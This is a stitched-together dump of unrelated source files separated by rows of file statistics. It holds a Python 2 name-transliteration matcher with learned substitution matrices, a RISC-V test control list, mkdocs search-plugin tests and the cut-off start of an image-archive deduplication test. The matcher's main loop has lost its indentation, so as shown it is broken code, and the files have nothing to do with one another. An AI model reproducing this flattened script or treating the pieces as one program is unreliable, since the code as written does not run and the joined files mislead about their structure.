[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 3, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 26, 3, 1, 1, 1, 2, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 12, 5, 6, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 2, 1, 1, 1, 5, 1, 1, 1, 26, 1, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 2, 1, 1, 1, 7, 1 ],
[ 2, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 20, 1, 1, 1, 1, 1, 1, 26 ]
]
improvedMatrix_800 = [
[ 6074, 22, 19, 15, 293, 1, 7, 20, 369, 0, 5, 28, 8, 38, 628, 1, 0, 58, 357, 15, 517, 4, 10, 0, 109, 2 ],
[ 10, 1176, 0, 0, 18, 0, 0, 0, 10, 0, 0, 6, 0, 1, 6, 0, 0, 0, 0, 0, 16, 0, 5, 0, 0, 0 ],
[ 0, 0, 3, 0, 0, 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0 ],
[ 2, 0, 0, 1735, 39, 0, 2, 0, 1, 1, 0, 1, 0, 1, 4, 0, 0, 1, 0, 2, 3, 0, 3, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 3, 486, 0, 7, 3, 2, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0 ],
[ 6, 4, 0, 0, 35, 0, 1053, 0, 6, 0, 0, 24, 0, 7, 3, 0, 9, 4, 0, 2, 0, 0, 0, 0, 0, 0 ],
[ 29, 0, 0, 0, 200, 0, 0, 703, 0, 0, 0, 4, 0, 0, 0, 0, 0, 2, 0, 0, 2, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 1, 0, 0, 0, 12, 0, 59, 0, 4, 364, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 20, 0, 656, 0, 63, 0, 0, 0, 15, 0, 1214, 5, 0, 3, 25, 0, 125, 12, 0, 0, 35, 0, 1, 40, 0, 0 ],
[ 31, 2, 1, 2, 72, 0, 0, 0, 15, 0, 2, 2118, 0, 1, 22, 0, 0, 4, 11, 4, 2, 0, 0, 0, 0, 0 ],
[ 22, 0, 0, 0, 20, 0, 0, 0, 5, 0, 0, 0, 1676, 2, 3, 4, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0 ],
[ 24, 2, 1, 10, 99, 0, 41, 0, 21, 0, 9, 3, 2, 3617, 6, 0, 0, 3, 9, 17, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 10, 0, 0, 0, 28, 0, 0, 0, 5, 0, 0, 3, 0, 0, 17, 694, 0, 5, 0, 0, 2, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 34, 2, 10, 0, 39, 0, 6, 8, 35, 0, 6, 6, 2, 14, 29, 4, 0, 3000, 1, 2, 8, 0, 0, 0, 4, 5 ],
[ 13, 12, 146, 0, 86, 7, 3, 10, 9, 0, 32, 34, 17, 15, 7, 63, 2, 3, 2013, 174, 2, 0, 3, 57, 0, 2 ],
[ 35, 0, 3, 0, 58, 0, 8, 20, 27, 14, 0, 2, 0, 0, 32, 0, 0, 31, 11, 1810, 15, 0, 0, 0, 0, 4 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 32, 14, 8, 6, 93, 2, 5, 6, 18, 0, 8, 32, 5, 30, 2620, 4, 10, 62, 21, 20, 1021, 455, 467, 1, 6, 2 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 124, 18, 40, 34, 597, 5, 27, 1, 3431, 15, 12, 76, 17, 151, 16, 5, 0, 36, 76, 57, 108, 47, 22, 0, 857, 26 ],
[ 12, 3, 0, 0, 30, 0, 3, 0, 0, 9, 5, 0, 3, 0, 0, 0, 0, 2, 280, 0, 0, 0, 0, 6, 0, 378 ]
]
improvedMatrix_1000 = [
[ 7595, 26, 33, 17, 347, 2, 7, 35, 482, 0, 8, 44, 8, 41, 759, 6, 0, 75, 442, 28, 663, 7, 8, 0, 106, 2 ],
[ 18, 1483, 0, 0, 21, 0, 0, 0, 4, 0, 0, 4, 0, 3, 6, 0, 0, 0, 1, 0, 19, 0, 12, 0, 0, 0 ],
[ 0, 0, 11, 0, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0 ],
[ 3, 0, 0, 2126, 62, 0, 4, 0, 2, 0, 0, 2, 0, 3, 4, 0, 0, 2, 0, 4, 1, 0, 1, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 1, 610, 0, 9, 3, 1, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0 ],
[ 5, 3, 0, 0, 31, 0, 1359, 0, 9, 0, 2, 11, 0, 9, 6, 0, 10, 5, 0, 3, 0, 0, 0, 0, 0, 0 ],
[ 46, 0, 0, 0, 264, 0, 0, 901, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 18, 0, 90, 0, 2, 478, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 23, 0, 830, 0, 81, 0, 0, 0, 18, 0, 1485, 7, 0, 5, 26, 0, 131, 16, 0, 0, 26, 0, 2, 37, 0, 0 ],
[ 41, 3, 2, 5, 75, 0, 0, 0, 20, 0, 4, 2698, 0, 4, 25, 0, 0, 3, 19, 8, 1, 3, 0, 0, 0, 0 ],
[ 40, 0, 0, 0, 36, 0, 0, 0, 9, 0, 0, 0, 2002, 2, 2, 5, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0 ],
[ 18, 3, 9, 23, 134, 0, 46, 0, 23, 0, 12, 4, 8, 4662, 9, 0, 0, 4, 1, 22, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 14, 0, 0, 0, 37, 0, 0, 0, 9, 0, 0, 10, 0, 0, 10, 842, 0, 5, 0, 0, 3, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 37, 5, 9, 0, 65, 0, 5, 7, 46, 0, 11, 4, 1, 12, 25, 2, 0, 3714, 2, 2, 13, 0, 0, 0, 4, 5 ],
[ 15, 12, 216, 0, 94, 4, 5, 8, 10, 0, 43, 49, 26, 14, 11, 69, 2, 4, 2590, 233, 1, 0, 2, 57, 0, 3 ],
[ 49, 0, 5, 0, 107, 0, 3, 29, 24, 20, 0, 4, 0, 0, 43, 0, 0, 42, 14, 2240, 15, 0, 0, 0, 0, 7 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 38, 12, 8, 2, 120, 6, 6, 9, 26, 0, 5, 59, 20, 35, 3162, 10, 10, 64, 26, 18, 1340, 557, 619, 2, 3, 4 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 165, 22, 53, 44, 807, 3, 20, 10, 4348, 14, 19, 85, 28, 200, 21, 9, 0, 38, 110, 80, 132, 63, 17, 0, 1101, 23 ],
[ 17, 4, 0, 0, 40, 0, 5, 0, 0, 11, 6, 0, 7, 0, 0, 0, 0, 5, 341, 0, 0, 0, 0, 10, 0, 427 ]
]
# f4.close()
pNames = f2.readlines()
lNames = f3.readlines()
# ori_blosum62 = [[ ori_blosum62[ row ][ col ]+4 for col in range(26)] for row in range(26) ]
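# letter_empty_average[x] acts as a per-letter gap penalty: the midpoint of the
# smallest and largest entries in letter x's row of the learned substitution matrix.
# Subtracting it in the DP below penalises aligning that letter against a gap.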
letter_empty_average = [0 for row in range(26)]
for i in range(26):
    letter_empty_average[ i ] = ( min(improvedMatrix_500_Modified[i]) + max(improvedMatrix_500_Modified[i]) ) // 2
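# Main loop: for each Persian-script name in train.txt, strip its Latin label, then
# score it against every candidate in names.txt with a global alignment driven by
# the learned matrix. A leading space is prepended so index 0 serves as the DP
# boundary, and non-alphabetic characters are clamped to index 0 ('a').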
for pName in pNames:
maxDistance = -10000
matchName = ""
pName = pName.replace(pName," "+pName)
index = pName.find('\t')
pName = pName[0:index]
pName = pName.lower()
for lName in lNames:
lName = lName.replace(lName," "+lName)
index = lName.find('\n')
lName = lName[0:index]
        # Initialize the first row & column of the distance array:
lenP = len( pName )
lenL = len( lName )
distanceG = [[0 for i in range(lenL) ] for i in range(lenP)]
distanceG[ 0 ][ 0 ] = 0
for i in range(1,lenL):
x = ord( lName[ i ] ) - 97
if x<0:
x = 0
distanceG[ 0 ][ i ] = distanceG[ 0 ][ i-1 ] - letter_empty_average[ x ]
for i in range(1,lenP):
x = ord( pName[i] ) - 97
if x<0:
x = 0
distanceG[ i ][ 0 ] = distanceG[ i-1 ][ 0 ] - letter_empty_average[ x ]
for i in range(1,lenP):
x = ord( pName[i] ) - 97
if x < 0:
x = 0
for j in range(1,lenL):
y = ord( lName[j] ) - 97
if y < 0:
y = 0
if pName[ i ] == lName[ j ]:
distanceG[ i ][ j ] = max(
distanceG[ i-1 ][ j-1 ] + improvedMatrix_500_Modified[ y ][ x ],
distanceG[ i-1 ][ j ] - letter_empty_average[ x ],
distanceG[ i ][ j-1 ] - letter_empty_average[ y ]
)
else:
distanceG[ i ][ j ] = max(
distanceG[ i-1 ][ j-1 ] + improvedMatrix_500_Modified[ y ][ x ] - improvedMatrix_500_Modified[ y ][ y ],
distanceG[ i-1 ][ j ] - letter_empty_average[ x ],
distanceG[ i ][ j-1 ] - letter_empty_average[ y ]
)
if distanceG[ lenP-1 ][ lenL-1 ] > maxDistance:
maxDistance = distanceG[ lenP-1 ][ lenL-1 ]
matchName = lName
matchName = matchName[1:]
pName = pName[1:].upper()
print pName+ "\t" + matchName,maxDistance
f8.write(pName+ "\t" + matchName + "\n")
f8.close()
# Close the Files:
f1.close()
f2.close()
f3.close()
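
# A self-contained sketch (hypothetical toy helper, not called by the script
# above) of the same Needleman-Wunsch-style recurrence used in the matching
# loop: each cell takes the best of a diagonal match/mismatch step and two gap
# steps, with `gap` playing the role of letter_empty_average.
def toy_align(a, b, score, gap):
    d = [[0] * len(b) for _ in range(len(a))]
    for i in range(1, len(a)):
        d[i][0] = d[i - 1][0] - gap
    for j in range(1, len(b)):
        d[0][j] = d[0][j - 1] - gap
    for i in range(1, len(a)):
        for j in range(1, len(b)):
            d[i][j] = max(d[i - 1][j - 1] + score(a[i], b[j]),
                          d[i - 1][j] - gap,
                          d[i][j - 1] - gap)
    return d[-1][-1]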
| 73.431438 | 165 | 0.30051 | 7,645 | 43,912 | 1.71877 | 0.054284 | 0.28965 | 0.35411 | 0.408524 | 0.676484 | 0.612405 | 0.567047 | 0.52382 | 0.500989 | 0.486834 | 0 | 0.339161 | 0.502391 | 43,912 | 597 | 166 | 73.554439 | 0.262185 | 0.491141 | 0 | 0.172973 | 0 | 0.021622 | 0.023821 | 0.022782 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027027 | null | null | 0.005405 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fadc39c0ad2266424d5b250dfc65be4ebcc5caa2 | 125 | py | Python | editor/lib/juma/__init__.py | RazielSun/juma-editor | 125720f7386f9f0a4cd3466a45c883d6d6020e33 | [
"MIT"
] | null | null | null | editor/lib/juma/__init__.py | RazielSun/juma-editor | 125720f7386f9f0a4cd3466a45c883d6d6020e33 | [
"MIT"
] | null | null | null | editor/lib/juma/__init__.py | RazielSun/juma-editor | 125720f7386f9f0a4cd3466a45c883d6d6020e33 | [
"MIT"
] | 1 | 2022-03-31T00:50:23.000Z | 2022-03-31T00:50:23.000Z | from core import *
##----------------------------------------------------------------##
def startup():
    startupTool( None )
| 20.833333 | 68 | 0.312 | 7 | 125 | 5.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096 | 125 | 5 | 69 | 25 | 0.345133 | 0.512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
87be7b64ed70b08a69f6bbb9fa0965a3fa2e07a0 | 4,590 | py | Python | tests/riscv/_rv32_fctrl.py | noahsherrill/force-riscv | 500cec3017f619dbf853a497bf02eaeecca927c9 | [
"Apache-2.0"
] | 111 | 2020-06-12T22:31:30.000Z | 2022-03-19T03:45:20.000Z | tests/riscv/_rv32_fctrl.py | noahsherrill/force-riscv | 500cec3017f619dbf853a497bf02eaeecca927c9 | [
"Apache-2.0"
] | 34 | 2020-06-12T20:23:40.000Z | 2022-03-15T20:04:31.000Z | tests/riscv/_rv32_fctrl.py | noahsherrill/force-riscv | 500cec3017f619dbf853a497bf02eaeecca927c9 | [
"Apache-2.0"
] | 32 | 2020-06-12T19:15:26.000Z | 2022-02-20T11:38:31.000Z | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
control_items = [
{
"fname": "rv32/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "APIs/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "APIs/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "address_solving/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "loop/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "loop/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "branch/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "branch/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "exception_handlers/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/g_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/g_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/c_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/c_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/v_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/v_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/priv_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/priv_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/zfh_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "paging/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "paging/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "privilege_switch/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "privilege_switch/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "state_transition/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "vector/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "../../examples/riscv/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "bnt/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "register/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "register/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "multiprocessing/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "multiprocessing/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "thread_group/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "thread_group/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
]
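
# Sketch of how a harness might consume this table (hypothetical helper; the
# real runner that reads control_items lives outside this file):
def iter_fctrl_commands(items=None):
    """Yield (fname, generator_args) pairs for each registered control file."""
    for entry in (items if items is not None else control_items):
        args = [token for pair in entry["generator"].items() for token in pair]
        yield entry["fname"], args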
| 31.22449 | 70 | 0.564488 | 474 | 4,590 | 5.227848 | 0.2173 | 0.090395 | 0.206618 | 0.245359 | 0.776836 | 0.776836 | 0.776836 | 0.776836 | 0.776836 | 0.758676 | 0 | 0.021203 | 0.239651 | 4,590 | 146 | 71 | 31.438356 | 0.688825 | 0.12658 | 0 | 0.246154 | 0 | 0 | 0.582269 | 0.387178 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
87d10cacd932ab8917b597c3468e9376b2a02814 | 1,358 | py | Python | tests/test_search.py | brospars/mkdocs-static-i18n | be7c0149dda30c4269a694cb552849a5ed53e11d | [
"MIT"
] | 63 | 2021-02-08T14:04:02.000Z | 2022-03-27T09:33:04.000Z | tests/test_search.py | brospars/mkdocs-static-i18n | be7c0149dda30c4269a694cb552849a5ed53e11d | [
"MIT"
] | 84 | 2021-02-08T13:30:14.000Z | 2022-03-31T07:13:05.000Z | tests/test_search.py | brospars/mkdocs-static-i18n | be7c0149dda30c4269a694cb552849a5ed53e11d | [
"MIT"
] | 16 | 2021-03-08T02:04:38.000Z | 2022-03-18T03:45:40.000Z | from mkdocs.commands.build import build
def test_search_add_lang(config_plugin_search):
    config = config_plugin_search
    build(config)
    search_plugin = config["plugins"]["search"]
    assert search_plugin.config["lang"] == ["en", "fr"]


def test_search_entries(config_plugin_search):
    config = config_plugin_search
    config["plugins"]["i18n"].config["languages"] = {"fr": "français"}
    build(config)
    search_plugin = config["plugins"]["search"]
    assert len(search_plugin.search_index._entries) == 30


def test_search_entries_no_directory_urls(config_plugin_search):
    config = config_plugin_search
    config["use_directory_urls"] = False
    config["plugins"]["i18n"].config["languages"] = {"fr": "français"}
    build(config)
    search_plugin = config["plugins"]["search"]
    assert len(search_plugin.search_index._entries) == 30


def test_search_deduplicate_entries(config_plugin_search):
    config = config_plugin_search
    build(config)
    search_plugin = config["plugins"]["search"]
    assert len(search_plugin.search_index._entries) == 30


def test_search_deduplicate_entries_no_directory_urls(config_plugin_search):
    config = config_plugin_search
    config["use_directory_urls"] = False
    build(config)
    search_plugin = config["plugins"]["search"]
    assert len(search_plugin.search_index._entries) == 30
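

# The entry-count tests above differ only in use_directory_urls; a hypothetical
# parametrized variant (sketch, assuming pytest supplies the
# config_plugin_search fixture, as the signatures suggest) could collapse them:
import pytest


@pytest.mark.parametrize("directory_urls", [True, False])
def test_search_entry_count(config_plugin_search, directory_urls):
    config = config_plugin_search
    config["use_directory_urls"] = directory_urls
    build(config)
    assert len(config["plugins"]["search"].search_index._entries) == 30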
| 33.121951 | 76 | 0.737113 | 168 | 1,358 | 5.595238 | 0.172619 | 0.178723 | 0.191489 | 0.204255 | 0.901064 | 0.901064 | 0.901064 | 0.901064 | 0.848936 | 0.848936 | 0 | 0.010274 | 0.139912 | 1,358 | 40 | 77 | 33.95 | 0.794521 | 0 | 0 | 0.766667 | 0 | 0 | 0.124448 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.166667 | false | 0 | 0.033333 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
e20b57caba79d74bcfa5412839924857162f8f6b | 18,280 | py | Python | Tests/Test_validateTestArches.py | brucewxh/IntraArchiveDeduplicator | 7b0c07cc9fffa75e1b7be285f42b0a8fad42dcfb | [
"BSD-3-Clause"
] | 86 | 2015-01-13T15:02:08.000Z | 2021-12-24T02:13:03.000Z | Tests/Test_validateTestArches.py | brucewxh/IntraArchiveDeduplicator | 7b0c07cc9fffa75e1b7be285f42b0a8fad42dcfb | [
"BSD-3-Clause"
] | 4 | 2016-11-18T20:08:50.000Z | 2018-03-08T23:05:37.000Z | Tests/Test_validateTestArches.py | brucewxh/IntraArchiveDeduplicator | 7b0c07cc9fffa75e1b7be285f42b0a8fad42dcfb | [
"BSD-3-Clause"
] | 12 | 2015-05-03T07:56:50.000Z | 2021-03-11T12:38:56.000Z |
import unittest
import scanner.logSetup as logSetup
import os.path
import pprint
import pArch
# Unit testing driven by lolcat images
# AS GOD INTENDED!
arches = [
"allArch.zip",
"notQuiteAllArch.zip",
"regular.zip",
"small.zip",
"testArch.zip",
"z_reg_junk.zip",
"z_reg.zip",
"z_sml_u.zip",
"z_sml_w.zip",
"z_sml.zip",
"regular-u.zip",
"small_and_regular_half_common.zip",
"small_and_regular.zip",
]
expect = {'allArch.zip': [('Lolcat_this_is_mah_job.jpg',
{'hexHash': 'd9ceeb6b43c2d7d096532eabfa6cf482',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('Lolcat_this_is_mah_job.png',
{'hexHash': '1268e704908cc39299d73d6caafc23a0',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/png'}),
('Lolcat_this_is_mah_job_small.jpg',
{'hexHash': '40d39c436e14282dcda06e8aff367307',
'imX': 300,
'imY': 237,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('dangerous-to-go-alone.jpg',
{'hexHash': 'dcd6097eeac911efed3124374f44085b',
'imX': 325,
'imY': 307,
'pHash': -7813072021139921681,
'type': 'image/jpeg'}),
('lolcat-crocs.jpg',
{'hexHash': '6d0a977694630ac9d1d33a7f068e10f8',
'imX': 500,
'imY': 363,
'pHash': -7472365462264617431,
'type': 'image/jpeg'}),
('lolcat-oregon-trail.jpg',
{'hexHash': '7227289a017988b6bdcf61fd4761f6b9',
'imX': 501,
'imY': 356,
'pHash': -3164295607292040329,
'type': 'image/jpeg'})],
'notQuiteAllArch.zip': [('Lolcat_this_is_mah_job.jpg',
{'hexHash': 'd9ceeb6b43c2d7d096532eabfa6cf482',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('Lolcat_this_is_mah_job.png',
{'hexHash': '1268e704908cc39299d73d6caafc23a0',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/png'}),
('Lolcat_this_is_mah_job_small.jpg',
{'hexHash': '40d39c436e14282dcda06e8aff367307',
'imX': 300,
'imY': 237,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('lolcat-crocs.jpg',
{'hexHash': '6d0a977694630ac9d1d33a7f068e10f8',
'imX': 500,
'imY': 363,
'pHash': -7472365462264617431,
'type': 'image/jpeg'}),
('lolcat-oregon-trail.jpg',
{'hexHash': '7227289a017988b6bdcf61fd4761f6b9',
'imX': 501,
'imY': 356,
'pHash': -3164295607292040329,
'type': 'image/jpeg'})],
'regular-u.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'}),
('funny-pictures-cat-will-do-science.jpg',
{'hexHash': '5b5620b0cfcb469aef632864707a0445',
'imX': 500,
'imY': 674,
'pHash': -8653036037266837299,
'type': 'image/jpeg'}),
('funny-pictures-kitten-rules-a-tower.jpg',
{'hexHash': 'a26d63bdbb38621b8f44c563ff496987',
'imX': 500,
'imY': 375,
'pHash': -1016743032983903389,
'type': 'image/jpeg'}),
('superheroes-batman-superman-i-would-watch-the-hell-out-of-this.jpg',
{'hexHash': '2931dfcefe6af7c5d024eb798ac5e7c6',
'imX': 472,
'imY': 700,
'pHash': -2452239955093831550,
'type': 'image/jpeg'})],
'regular.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
